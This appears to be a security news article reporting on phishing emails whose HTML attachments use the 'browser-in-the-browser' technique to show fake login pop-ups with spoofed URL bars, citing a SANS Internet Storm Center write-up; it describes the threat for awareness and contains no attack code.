Phishing actors are now following a new attack approach, sending emails with HTML attachments that employ the ‘browser-in-the-browser’ technique.
A sample of such an email was captured by Jan Kopriva, who published the relevant write-up on the SANS Internet Storm Center site to raise awareness about the tricky threat.
Browser-in-the-browser is a technique that displays a simulated window inside the HTML page to trick a website visitor into thinking it’s a login pop-up. Because the URL bar of the fake window is rendered on the site, it can assume any legitimate domain name, making the victim believe they are about to enter their account credentials on the real platform.
This technique has been extensively employed in malicious websites that perform phishing. For example, this fairly recent report from Group-IB reveals how phishing actors use browser-in-the-browser to steal Steam accounts.
However, this is the first time that the technique appears directly in emails, which can make it even more deceptive and hard to distinguish.
As Kopriva explains in the report, the malicious email supposedly contains a proposal, urging the recipient to open the HTML attachment to read it.
Once opened, the victim will get options to log in with popular services like Gmail, Office 365, Outlook, Yahoo, AOL. There’s also a passepartout option under “Other.”
Contents of the email attachment
Clicking on any these icons will generate the corresponding fake browser-in-the-browser pop-ups with valid URLs while also matching the appearance of the victim’s window bar theme.
Fake login windows generated